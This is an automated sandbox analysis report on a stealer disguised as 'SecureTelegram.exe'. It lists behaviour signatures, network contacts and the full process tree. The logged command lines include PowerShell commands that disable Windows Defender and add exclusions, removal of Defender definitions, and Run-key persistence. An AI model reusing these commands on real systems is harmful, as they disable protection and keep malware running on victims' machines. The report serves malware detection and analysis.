3134316cd5f860361755f9370505e440ee9fd91a2e15ae8c27bf5aceafb70030

Analysis

max time kernel
30s
max time network
47s
platform
windows10-2004_x64
resource
win10v2004-20240611-en
resource tags

arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system
submitted
30-06-2024 17:49

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

SecureTelegram.exe
Size

37.0MB
MD5

704c4cb99b74b3bf258a99ebe601a9b1
SHA1

ab66a01cb4f912e76ed4af4aa999d80fb63edf83
SHA256

3134316cd5f860361755f9370505e440ee9fd91a2e15ae8c27bf5aceafb70030
SHA512

442c596beb5035c4fad8ef141e889c9d286d93694877a2a82b3081322de04b32c7fade62f7743c7a8852df0a2f3707a075b5ad1bee083a5714d8056ecf3c9259
SSDEEP

786432:qRQBrRSY+R46huYqwAO4YoMGD6Oaf3ooHLl0UAlYBLe+9qz7fEg:qROrRR+R4WurwAO49QvocBAlYBLe+G7R

Score

8^/10

evasion execution persistence privilege_escalation pyinstaller spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exe

pid process

2936 powershell.exe
5264 powershell.exe
1616 powershell.exe
5728 powershell.exe
Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

pid	process
2936	powershell.exe
5264	powershell.exe
1616	powershell.exe
5728	powershell.exe

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

Build.exes.exemain.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Control Panel\International\Geo\Nation	Build.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Control Panel\International\Geo\Nation	s.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Control Panel\International\Geo\Nation	main.exe

Executes dropped EXE 12 IoCs

Processes:

Build.exehacn.exehacn.exebased.exebased.exes.exemain.exesvchost.exesetup.exesvchost.exerar.exeUpdate.exe

pid process

3040 Build.exe
4324 hacn.exe
3316 hacn.exe
588 based.exe
1276 based.exe
3936 s.exe
5184 main.exe
5608 svchost.exe
5704 setup.exe
5296 svchost.exe
7572 rar.exe
7668 Update.exe

pid	process
3040	Build.exe
4324	hacn.exe
3316	hacn.exe
588	based.exe
1276	based.exe
3936	s.exe
5184	main.exe
5608	svchost.exe
5704	setup.exe
5296	svchost.exe
7572	rar.exe
7668	Update.exe

Loads dropped DLL 48 IoCs

Processes:

SecureTelegram.exehacn.exebased.exemain.exesvchost.exeUpdate.exe

pid	process
5084	SecureTelegram.exe
5084	SecureTelegram.exe
3316	hacn.exe
3316	hacn.exe
1276	based.exe
1276	based.exe
1276	based.exe
1276	based.exe
1276	based.exe
1276	based.exe
1276	based.exe
1276	based.exe
1276	based.exe
1276	based.exe
1276	based.exe
1276	based.exe
1276	based.exe
1276	based.exe
1276	based.exe
1276	based.exe
5184	main.exe
5296	svchost.exe
5296	svchost.exe
5296	svchost.exe
5296	svchost.exe
5296	svchost.exe
5296	svchost.exe
5296	svchost.exe
5296	svchost.exe
5296	svchost.exe
5296	svchost.exe
5296	svchost.exe
5296	svchost.exe
5296	svchost.exe
5296	svchost.exe
5296	svchost.exe
5296	svchost.exe
5296	svchost.exe
5296	svchost.exe
5296	svchost.exe
5296	svchost.exe
5296	svchost.exe
5296	svchost.exe
5296	svchost.exe
5296	svchost.exe
5296	svchost.exe
5296	svchost.exe
7668	Update.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 32 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\_MEI41202\python312.dll	upx
behavioral2/memory/5084-16-0x00007FFC511A0000-0x00007FFC51870000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\_MEI41202\_socket.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI41202\_lzma.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI41202\_hashlib.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI41202\_decimal.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI41202\_bz2.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI41202\unicodedata.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI41202\select.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI41202\libcrypto-3.dll	upx
behavioral2/memory/1276-103-0x00007FFC4FB60000-0x00007FFC50230000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\_MEI5882\libffi-8.dll	upx
C:\Users\Admin\AppData\Local\Temp\_MEI5882\_ssl.pyd	upx
behavioral2/memory/1276-126-0x00007FFC64900000-0x00007FFC6490F000-memory.dmp	upx
behavioral2/memory/1276-125-0x00007FFC52310000-0x00007FFC52335000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\_MEI5882\_sqlite3.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI5882\_queue.pyd	upx
behavioral2/memory/1276-140-0x00007FFC508F0000-0x00007FFC50914000-memory.dmp	upx
behavioral2/memory/1276-147-0x00007FFC504E0000-0x00007FFC505FB000-memory.dmp	upx
behavioral2/memory/1276-146-0x00007FFC60CB0000-0x00007FFC60CBD000-memory.dmp	upx
behavioral2/memory/1276-145-0x00007FFC50600000-0x00007FFC506CD000-memory.dmp	upx
behavioral2/memory/1276-144-0x00007FFC506D0000-0x00007FFC50703000-memory.dmp	upx
behavioral2/memory/1276-143-0x00007FFC60ED0000-0x00007FFC60EDD000-memory.dmp	upx
behavioral2/memory/1276-142-0x00007FFC57800000-0x00007FFC57819000-memory.dmp	upx
behavioral2/memory/1276-141-0x00007FFC50770000-0x00007FFC508E7000-memory.dmp	upx
behavioral2/memory/1276-139-0x00007FFC5FDF0000-0x00007FFC5FE09000-memory.dmp	upx
behavioral2/memory/1276-138-0x00007FFC4F630000-0x00007FFC4FB52000-memory.dmp	upx
behavioral2/memory/1276-137-0x00007FFC646F0000-0x00007FFC64705000-memory.dmp	upx
behavioral2/memory/1276-136-0x00007FFC52120000-0x00007FFC5214D000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\_MEI5882\sqlite3.dll	upx
C:\Users\Admin\AppData\Local\Temp\_MEI5882\libssl-3.dll	upx
C:\Users\Admin\AppData\Local\Temp\_MEI5882\_ctypes.pyd	upx

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

svchost.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\кокершмидт = "C:\\ProgramData\\svchost.exe"	svchost.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs

Web Service
T1102

Processes:

flow ioc

36 raw.githubusercontent.com
37 raw.githubusercontent.com
41 raw.githubusercontent.com
96 raw.githubusercontent.com
118 discord.com
119 discord.com
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

46 api.ipify.org
47 api.ipify.org
33 ip-api.com
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

Processes:

svchost.exe

pid process

5296 svchost.exe
Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exe

pid process

2752 sc.exe
6184 sc.exe
6196 sc.exe
6224 sc.exe
6240 sc.exe
Detects Pyinstaller 2 IoCs
pyinstaller

Processes:

resource yara_rule

C:\ProgramData\Microsoft\hacn.exe pyinstaller
C:\ProgramData\svchost.exe pyinstaller
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

flow	ioc
36	raw.githubusercontent.com
37	raw.githubusercontent.com
41	raw.githubusercontent.com
96	raw.githubusercontent.com
118	discord.com
119	discord.com

flow	ioc
46	api.ipify.org
47	api.ipify.org
33	ip-api.com

pid	process
5296	svchost.exe

pid	process
2752	sc.exe
6184	sc.exe
6196	sc.exe
6224	sc.exe
6240	sc.exe

resource	yara_rule
C:\ProgramData\Microsoft\hacn.exe	pyinstaller
C:\ProgramData\svchost.exe	pyinstaller

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

Processes:

netsh.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

7252 timeout.exe
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.

System Information Discovery
T1082

Processes:

WMIC.exe

pid process

6120 WMIC.exe
Enumerates processes with tasklist 1 TTPs 4 IoCs

Process Discovery
T1057

Processes:

tasklist.exetasklist.exetasklist.exetasklist.exe

pid process

3192 tasklist.exe
1172 tasklist.exe
3496 tasklist.exe
3316 tasklist.exe
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.

System Information Discovery
T1082

Processes:

systeminfo.exe

pid process

5680 systeminfo.exe
Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

6004 reg.exe
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence execution

Scheduled Task
T1053.005

Processes:

schtasks.exe

pid process

6368 schtasks.exe

pid	process
7252	timeout.exe

pid	process
6120	WMIC.exe

pid	process
3192	tasklist.exe
1172	tasklist.exe
3496	tasklist.exe
3316	tasklist.exe

pid	process
5680	systeminfo.exe

pid	process
6004	reg.exe

pid	process
6368	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exemain.exepowershell.exepowershell.exeUpdate.exe

pid	process
2868	powershell.exe
2868	powershell.exe
1616	powershell.exe
1616	powershell.exe
1616	powershell.exe
2868	powershell.exe
2936	powershell.exe
2936	powershell.exe
2936	powershell.exe
1456	powershell.exe
1456	powershell.exe
1456	powershell.exe
5728	powershell.exe
5728	powershell.exe
5728	powershell.exe
5184	main.exe
5184	main.exe
5184	main.exe
5184	main.exe
5184	main.exe
5184	main.exe
5184	main.exe
5184	main.exe
5184	main.exe
5184	main.exe
5184	main.exe
5184	main.exe
5184	main.exe
5184	main.exe
5184	main.exe
5184	main.exe
5184	main.exe
5184	main.exe
5184	main.exe
5184	main.exe
5184	main.exe
5184	main.exe
5184	main.exe
5184	main.exe
6872	powershell.exe
6872	powershell.exe
6872	powershell.exe
7216	powershell.exe
7216	powershell.exe
7216	powershell.exe
7668	Update.exe
7668	Update.exe
7668	Update.exe
7668	Update.exe
7668	Update.exe
7668	Update.exe
7668	Update.exe
7668	Update.exe
7668	Update.exe
7668	Update.exe
7668	Update.exe
7668	Update.exe
7668	Update.exe
7668	Update.exe
7668	Update.exe
7668	Update.exe
7668	Update.exe
7668	Update.exe
7668	Update.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowershell.exetasklist.exetasklist.exepowershell.exetasklist.exepowershell.exeWMIC.exemain.exepowershell.exepowershell.exetasklist.exepowershell.exeUpdate.exeWMIC.exe

description	pid	process
Token: SeDebugPrivilege	2868	powershell.exe
Token: SeDebugPrivilege	1616	powershell.exe
Token: SeDebugPrivilege	3496	tasklist.exe
Token: SeDebugPrivilege	3316	tasklist.exe
Token: SeDebugPrivilege	2936	powershell.exe
Token: SeDebugPrivilege	3192	tasklist.exe
Token: SeDebugPrivilege	1456	powershell.exe
Token: SeIncreaseQuotaPrivilege	5340	WMIC.exe
Token: SeSecurityPrivilege	5340	WMIC.exe
Token: SeTakeOwnershipPrivilege	5340	WMIC.exe
Token: SeLoadDriverPrivilege	5340	WMIC.exe
Token: SeSystemProfilePrivilege	5340	WMIC.exe
Token: SeSystemtimePrivilege	5340	WMIC.exe
Token: SeProfSingleProcessPrivilege	5340	WMIC.exe
Token: SeIncBasePriorityPrivilege	5340	WMIC.exe
Token: SeCreatePagefilePrivilege	5340	WMIC.exe
Token: SeBackupPrivilege	5340	WMIC.exe
Token: SeRestorePrivilege	5340	WMIC.exe
Token: SeShutdownPrivilege	5340	WMIC.exe
Token: SeDebugPrivilege	5340	WMIC.exe
Token: SeSystemEnvironmentPrivilege	5340	WMIC.exe
Token: SeRemoteShutdownPrivilege	5340	WMIC.exe
Token: SeUndockPrivilege	5340	WMIC.exe
Token: SeManageVolumePrivilege	5340	WMIC.exe
Token: 33	5340	WMIC.exe
Token: 34	5340	WMIC.exe
Token: 35	5340	WMIC.exe
Token: 36	5340	WMIC.exe
Token: SeDebugPrivilege	5184	main.exe
Token: SeIncreaseQuotaPrivilege	5340	WMIC.exe
Token: SeSecurityPrivilege	5340	WMIC.exe
Token: SeTakeOwnershipPrivilege	5340	WMIC.exe
Token: SeLoadDriverPrivilege	5340	WMIC.exe
Token: SeSystemProfilePrivilege	5340	WMIC.exe
Token: SeSystemtimePrivilege	5340	WMIC.exe
Token: SeProfSingleProcessPrivilege	5340	WMIC.exe
Token: SeIncBasePriorityPrivilege	5340	WMIC.exe
Token: SeCreatePagefilePrivilege	5340	WMIC.exe
Token: SeBackupPrivilege	5340	WMIC.exe
Token: SeRestorePrivilege	5340	WMIC.exe
Token: SeShutdownPrivilege	5340	WMIC.exe
Token: SeDebugPrivilege	5340	WMIC.exe
Token: SeSystemEnvironmentPrivilege	5340	WMIC.exe
Token: SeRemoteShutdownPrivilege	5340	WMIC.exe
Token: SeUndockPrivilege	5340	WMIC.exe
Token: SeManageVolumePrivilege	5340	WMIC.exe
Token: 33	5340	WMIC.exe
Token: 34	5340	WMIC.exe
Token: 35	5340	WMIC.exe
Token: 36	5340	WMIC.exe
Token: SeDebugPrivilege	5728	powershell.exe
Token: SeDebugPrivilege	6872	powershell.exe
Token: SeDebugPrivilege	1172	tasklist.exe
Token: SeDebugPrivilege	7216	powershell.exe
Token: SeDebugPrivilege	7668	Update.exe
Token: SeIncreaseQuotaPrivilege	7808	WMIC.exe
Token: SeSecurityPrivilege	7808	WMIC.exe
Token: SeTakeOwnershipPrivilege	7808	WMIC.exe
Token: SeLoadDriverPrivilege	7808	WMIC.exe
Token: SeSystemProfilePrivilege	7808	WMIC.exe
Token: SeSystemtimePrivilege	7808	WMIC.exe
Token: SeProfSingleProcessPrivilege	7808	WMIC.exe
Token: SeIncBasePriorityPrivilege	7808	WMIC.exe
Token: SeCreatePagefilePrivilege	7808	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

SecureTelegram.exeSecureTelegram.execmd.exeBuild.exehacn.exehacn.exebased.execmd.exebased.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 4120 wrote to memory of 5084	4120	SecureTelegram.exe	SecureTelegram.exe
PID 4120 wrote to memory of 5084	4120	SecureTelegram.exe	SecureTelegram.exe
PID 5084 wrote to memory of 5112	5084	SecureTelegram.exe	cmd.exe
PID 5084 wrote to memory of 5112	5084	SecureTelegram.exe	cmd.exe
PID 5112 wrote to memory of 3040	5112	cmd.exe	Build.exe
PID 5112 wrote to memory of 3040	5112	cmd.exe	Build.exe
PID 5112 wrote to memory of 3040	5112	cmd.exe	Build.exe
PID 3040 wrote to memory of 4324	3040	Build.exe	hacn.exe
PID 3040 wrote to memory of 4324	3040	Build.exe	hacn.exe
PID 4324 wrote to memory of 3316	4324	hacn.exe	tasklist.exe
PID 4324 wrote to memory of 3316	4324	hacn.exe	tasklist.exe
PID 3040 wrote to memory of 588	3040	Build.exe	based.exe
PID 3040 wrote to memory of 588	3040	Build.exe	based.exe
PID 3316 wrote to memory of 2736	3316	hacn.exe	cmd.exe
PID 3316 wrote to memory of 2736	3316	hacn.exe	cmd.exe
PID 588 wrote to memory of 1276	588	based.exe	based.exe
PID 588 wrote to memory of 1276	588	based.exe	based.exe
PID 2736 wrote to memory of 3936	2736	cmd.exe	s.exe
PID 2736 wrote to memory of 3936	2736	cmd.exe	s.exe
PID 2736 wrote to memory of 3936	2736	cmd.exe	s.exe
PID 1276 wrote to memory of 4360	1276	based.exe	cmd.exe
PID 1276 wrote to memory of 4360	1276	based.exe	cmd.exe
PID 1276 wrote to memory of 4560	1276	based.exe	cmd.exe
PID 1276 wrote to memory of 4560	1276	based.exe	cmd.exe
PID 1276 wrote to memory of 4612	1276	based.exe	cmd.exe
PID 1276 wrote to memory of 4612	1276	based.exe	cmd.exe
PID 1276 wrote to memory of 3844	1276	based.exe	cmd.exe
PID 1276 wrote to memory of 3844	1276	based.exe	cmd.exe
PID 4360 wrote to memory of 1616	4360	cmd.exe	powershell.exe
PID 4360 wrote to memory of 1616	4360	cmd.exe	powershell.exe
PID 4560 wrote to memory of 2868	4560	cmd.exe	powershell.exe
PID 4560 wrote to memory of 2868	4560	cmd.exe	powershell.exe
PID 4612 wrote to memory of 4876	4612	cmd.exe	find.exe
PID 4612 wrote to memory of 4876	4612	cmd.exe	find.exe
PID 1276 wrote to memory of 2676	1276	based.exe	cmd.exe
PID 1276 wrote to memory of 2676	1276	based.exe	cmd.exe
PID 1276 wrote to memory of 4568	1276	based.exe	cmd.exe
PID 1276 wrote to memory of 4568	1276	based.exe	cmd.exe
PID 4568 wrote to memory of 3496	4568	cmd.exe	tasklist.exe
PID 4568 wrote to memory of 3496	4568	cmd.exe	tasklist.exe
PID 2676 wrote to memory of 3316	2676	cmd.exe	tasklist.exe
PID 2676 wrote to memory of 3316	2676	cmd.exe	tasklist.exe
PID 3844 wrote to memory of 2936	3844	cmd.exe	powershell.exe
PID 3844 wrote to memory of 2936	3844	cmd.exe	powershell.exe
PID 1276 wrote to memory of 2800	1276	based.exe	cmd.exe
PID 1276 wrote to memory of 2800	1276	based.exe	cmd.exe
PID 1276 wrote to memory of 4000	1276	based.exe	cmd.exe
PID 1276 wrote to memory of 4000	1276	based.exe	cmd.exe
PID 1276 wrote to memory of 4372	1276	based.exe	cmd.exe
PID 1276 wrote to memory of 4372	1276	based.exe	cmd.exe
PID 1276 wrote to memory of 4740	1276	based.exe	cmd.exe
PID 1276 wrote to memory of 4740	1276	based.exe	cmd.exe
PID 4372 wrote to memory of 1456	4372	cmd.exe	powershell.exe
PID 4372 wrote to memory of 1456	4372	cmd.exe	powershell.exe
PID 4740 wrote to memory of 1296	4740	cmd.exe	tree.com
PID 4740 wrote to memory of 1296	4740	cmd.exe	tree.com
PID 4000 wrote to memory of 3192	4000	cmd.exe	tasklist.exe
PID 4000 wrote to memory of 3192	4000	cmd.exe	tasklist.exe
PID 1276 wrote to memory of 2664	1276	based.exe	cmd.exe
PID 1276 wrote to memory of 2664	1276	based.exe	cmd.exe
PID 2664 wrote to memory of 5164	2664	cmd.exe	netsh.exe
PID 2664 wrote to memory of 5164	2664	cmd.exe	netsh.exe
PID 1276 wrote to memory of 5228	1276	based.exe	cmd.exe
PID 1276 wrote to memory of 5228	1276	based.exe	cmd.exe

C:\Users\Admin\AppData\Local\Temp\SecureTelegram.exe
"C:\Users\Admin\AppData\Local\Temp\SecureTelegram.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4120

C:\Users\Admin\AppData\Local\Temp\SecureTelegram.exe
"C:\Users\Admin\AppData\Local\Temp\SecureTelegram.exe"
2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:5084

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\_MEI41202\Build.exe -pbeznogym
3⤵
- Suspicious use of WriteProcessMemory
PID:5112

C:\Users\Admin\AppData\Local\Temp\_MEI41202\Build.exe
C:\Users\Admin\AppData\Local\Temp\_MEI41202\Build.exe -pbeznogym
4⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3040

C:\ProgramData\Microsoft\hacn.exe
"C:\ProgramData\Microsoft\hacn.exe"
5⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4324

C:\ProgramData\Microsoft\hacn.exe
"C:\ProgramData\Microsoft\hacn.exe"
6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:3316

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\_MEI43242\s.exe -pbeznogym
7⤵
- Suspicious use of WriteProcessMemory
PID:2736

C:\Users\Admin\AppData\Local\Temp\_MEI43242\s.exe
C:\Users\Admin\AppData\Local\Temp\_MEI43242\s.exe -pbeznogym
8⤵
- Checks computer location settings
- Executes dropped EXE
PID:3936

C:\ProgramData\main.exe
"C:\ProgramData\main.exe"
9⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5184

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmpC0DF.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmpC0DF.tmp.bat
10⤵
PID:7064

C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 5184"
11⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1172

C:\Windows\system32\find.exe
find ":"
11⤵
PID:4876

C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
11⤵
- Delays execution with timeout.exe
PID:7252

C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe
"C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe"
11⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:7668

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ChromeUpdate /t REG_SZ /d C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe /f
12⤵
PID:5580

C:\Windows\system32\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ChromeUpdate /t REG_SZ /d C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe /f
13⤵
- Modifies registry key
PID:6004

C:\ProgramData\svchost.exe
"C:\ProgramData\svchost.exe"
9⤵
- Executes dropped EXE
PID:5608

C:\ProgramData\svchost.exe
"C:\ProgramData\svchost.exe"
10⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5296

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "ver"
11⤵
PID:5464

C:\ProgramData\setup.exe
"C:\ProgramData\setup.exe"
9⤵
- Executes dropped EXE
PID:5704

C:\ProgramData\Microsoft\based.exe
"C:\ProgramData\Microsoft\based.exe"
5⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:588

C:\ProgramData\Microsoft\based.exe
"C:\ProgramData\Microsoft\based.exe"
6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1276

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'"
7⤵
- Suspicious use of WriteProcessMemory
PID:4360

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'
8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1616

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
7⤵
- Suspicious use of WriteProcessMemory
PID:4560

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
8⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2868

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Get Fucked Discord ID thegodcai', 0, 'You Got Shit On SKID', 48+16);close()""
7⤵
- Suspicious use of WriteProcessMemory
PID:4612

C:\Windows\system32\mshta.exe
mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Get Fucked Discord ID thegodcai', 0, 'You Got Shit On SKID', 48+16);close()"
8⤵
PID:4876

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
7⤵
- Suspicious use of WriteProcessMemory
PID:3844

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2936

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
7⤵
- Suspicious use of WriteProcessMemory
PID:2676

C:\Windows\system32\tasklist.exe
tasklist /FO LIST
8⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:3316

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
7⤵
- Suspicious use of WriteProcessMemory
PID:4568

C:\Windows\system32\tasklist.exe
tasklist /FO LIST
8⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:3496

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
7⤵
PID:2800

C:\Windows\System32\Wbem\WMIC.exe
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
8⤵
- Suspicious use of AdjustPrivilegeToken
PID:5340

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
7⤵
- Suspicious use of WriteProcessMemory
PID:4372

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
8⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1456

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
7⤵
- Suspicious use of WriteProcessMemory
PID:4000

C:\Windows\system32\tasklist.exe
tasklist /FO LIST
8⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:3192

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
7⤵
- Suspicious use of WriteProcessMemory
PID:4740

C:\Windows\system32\tree.com
tree /A /F
8⤵
PID:1296

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
7⤵
- Suspicious use of WriteProcessMemory
PID:2664

C:\Windows\system32\netsh.exe
netsh wlan show profile
8⤵
- Event Triggered Execution: Netsh Helper DLL
PID:5164

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "systeminfo"
7⤵
PID:5144

C:\Windows\system32\systeminfo.exe
systeminfo
8⤵
- Gathers system information
PID:5680

C:\Windows\system32\cmd.exe
